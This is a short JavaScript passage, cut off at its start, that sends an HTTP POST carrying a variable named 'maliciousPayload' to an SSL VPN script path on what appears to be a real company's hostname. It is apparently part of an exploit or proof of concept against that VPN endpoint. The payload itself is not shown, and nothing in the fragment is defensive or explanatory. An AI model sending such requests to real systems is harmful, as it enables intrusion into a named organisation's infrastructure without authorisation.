';
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://keypoint.vocalink.com/dana-na/meeting/meeting_testjs.cgi', true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('malicious_payload=' + maliciousPayload);